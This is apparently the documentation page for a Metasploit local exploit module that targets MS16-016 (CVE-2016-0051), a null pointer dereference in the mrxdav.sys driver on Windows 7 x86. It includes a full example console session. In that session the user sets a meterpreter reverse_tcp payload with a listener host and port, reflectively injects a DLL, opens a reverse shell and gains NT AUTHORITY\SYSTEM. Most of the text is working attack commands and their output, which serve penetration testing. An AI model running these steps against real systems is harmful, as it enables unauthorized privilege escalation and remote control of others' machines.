## Introduction

This module exploits a null pointer dereference vulnerability present in the `mrxdav.sys` kernel driver on Windows 7 x86.  The vulnerability is described by MS16-016 and CVE-2016-0051.  The module allows the user to spawn a new payload, such as meterpreter, on the target system with elevated privileges (NT AUTHORITY\SYSTEM)

## Usage

You'll first need to obtain a session on the target system.  Next, once the module is loaded, one simply needs to set the `payload` and `session` options.  From here, running the module will result in the payload being executed with system level privileges.

An example session follows:


```
meterpreter > background
[*] Backgrounding session 5...
msf exploit(handler) > use exploits/windows/local/ms16_016_webdav
msf exploit(ms16_016_webdav) > set session 5
session => 5
msf exploit(ms16_016_webdav) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms16_016_webdav) > set lport 4567
lport => 4567
msf exploit(ms16_016_webdav) > set lhost 192.168.1.203
lhost => 192.168.1.203
msf exploit(ms16_016_webdav) > run

[*] Started reverse TCP handler on 192.168.1.203:4567
[*] Launching a process to host the payload DLL, then reflectively injecting the DLL and running it...
[*] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (957999 bytes) to 192.168.1.221
[*] Meterpreter session 12 opened (192.168.1.203:4567 -> 192.168.1.221:49266) at 2016-07-05 22:07:34 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```